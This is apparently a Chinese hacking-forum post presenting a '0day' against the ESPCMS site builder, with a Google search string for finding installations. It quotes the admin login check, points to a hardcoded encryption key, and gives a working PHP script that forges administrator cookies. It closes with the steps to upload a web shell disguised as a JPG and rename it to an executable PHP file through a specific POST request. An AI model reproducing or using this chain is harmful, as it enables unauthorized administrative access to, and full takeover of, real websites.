【漏洞】ESPCMS 易思企业建站系统 0day

以下版本没测试，测试的是最新版本。Google：Powered by ESPCMS，过程有点复杂，耐心看就明白。

看代码：“adminsoft\control”，里面的文件都是后台运行文件，每个文件开头都带有 $this->softbase(true)，用于载入基本数据，看：

以下是引用片段：

function softbase($admin_purview=false) {

                header("Content-Type: text/html; charset=utf-8");
                $this->dbmysql();
                $this->commandinc();
                $this->systemfile();
                $this->cachedb();
                if ($admin_purview) {
                        $this->admin_purview();
                }

admin_purview 是检测登录状态的
再看

function admin_purview() {
if ($this->fun->accept('archive', 'R') == 'filemanage' && $this->fun->accept('action', 'R') == 'batupfilesave') {

                        $ecisp_admininfo = $this->fun->accept('ecisp_admininfo', 'G');
                        $esp_powerlist = $this->fun->accept('esp_powerlist', 'G');
                        $gettype = false;
                } else {
                        $ecisp_admininfo = $this->fun->accept('ecisp_admininfo', 'C');
                        $esp_powerlist = $this->fun->accept('esp_powerlist', 'C');
                        $gettype = true;
                }

$arr_purview = explode('|', $this->fun->eccode($ecisp_admininfo, 'DECODE')); // 其他都没什么用这里才是重点 by Black Boy

$this->esp_powerlist = explode('|', $this->fun->eccode($esp_powerlist, 'DECODE'));

                list($this->esp_adminuserid, $this->esp_username, $this->esp_password, $this->esp_useragent, $this->esp_powerid, $this->esp_inputclassid, $this->esp_softurl) = $arr_purview;
                if ($gettype) {
                        if (empty($this->esp_username) || empty($this->esp_adminuserid) || md5(admin_AGENT) != $this->esp_useragent || md5(admin_ClassURL) != $this->esp_softurl) //检测是否有这些东西有就跳过检测没有就返回登录页面下面意思简单不解析了{Black Boy

以下是引用片段：

                                $condition = 0;
                        } else {
                                $condition = 1;
                        }
                } else {
                        if (empty($this->esp_username) || empty($this->esp_adminuserid) || md5(admin_ClassURL) != $this->esp_softurl) {
                                $condition = 0;
                        } else {
                                $condition = 1;
                        }
                }
                if ($condition == 0) {

                        if ($this->fun->accept('archive', 'R') != 'adminuser' && $this->fun->accept('action', 'R') != 'login') {
                                header('location: index.php?archive=adminuser&action=login');
                                exit();
                        }
                } else {

                        if ($condition == 1 && $this->fun->accept('point', 'R') == '' && $this->fun->accept('archive', 'R') == '' && $this->fun->accept('action', 'R') == '') {
                                header('location: index.php?archive=management&action=tab&loadfun=mangercenter');
                                exit();
                        }
                }
        }

那么现在最重点的就是 eccode 这个加密方式了
看代码

很明显解密都不用写了反过来行了一个一个加密过程解析出来很辛苦的
核心漏洞就是 $key='@LFK24s224%@safS3s%1f%'
不是随机生成

Exp：

<?
function eccode($string, $operation='DECODE', $key='@LFK24s224%@safS3s%1f%') {
                $result = '';
                if ($operation == 'ENCODE') {
                        for ($i = 0; $i < strlen($string); $i++) {
                                $char = substr($string, $i, 1);
                                $keychar = substr($key, ($i % strlen($key)) - 1, 1);
                                $char = chr(ord($char) + ord($keychar));
                                $result.=$char;
                        }
                        $result = base64_encode($result);
                        $result = str_replace(array('+', '/', '='), array('-', '_', ''), $result);
                } elseif ($operation == 'DECODE') {
                        $data = str_replace(array('-', '_'), array('+', '/'), $string);
                        $mod4 = strlen($data) % 4;
                        if ($mod4) {
                                $data .= substr('====', $mod4);
                        }
                        $string = base64_decode($data);
                        for ($i = 0; $i < strlen($string); $i++) {
                      $char = substr($string, $i, 1);
                                $keychar = substr($key, ($i % strlen($key)) - 1, 1);
                                $char = chr(ord($char) - ord($keychar));
                                $result.=$char;
                }
                }
                return $result;
        }
        define('admin_AGENT', $_SERVER['HTTP_USER_AGENT']);
        $name=$_POST[name];
        $s=md5(admin_AGENT);
        $ecisp_admininfo='1|admin|e00cf25ad42683b3df678c61f42c6bda|'.$s.'|1|1|'.md5("http://".$name."/adminsoft");
$a= eccode($ecisp_admininfo, 'ENCODE');
echo "ecisp_admininfo=".$a.";esp_powerlist=hqy4;"."<br><br><br>";
?>

<form method="post" action="http://www.hackersb.com/sb/test.php" enctype="multipart/form-data" id="upload">
<label>
<input name="name" type="text" value="www.t00ls.net" /> by:Black Boy www.hackersb.com
</label>
<div></div>
<input name="respondids" value="给我COOKIES " class="coolbg np" type="submit">
</form>

注：$s为当前浏览器版本，你用什么浏览器去运行这个程序的，就用这个浏览器去欺骗。

得出 COOKIES 后修改欺骗，进入后台。然后内容添加，上传文件，把马儿改成JPG上传。

最后POST：

/adminsoft/index.php?archive=filemanage&action=renamesave

path=/upfile/&dirname=product.jpg&newdirnam=1.php

product.jpg 为上传后的JPG木马文件，最后 webshell 就在：upfile/1.php

文章目录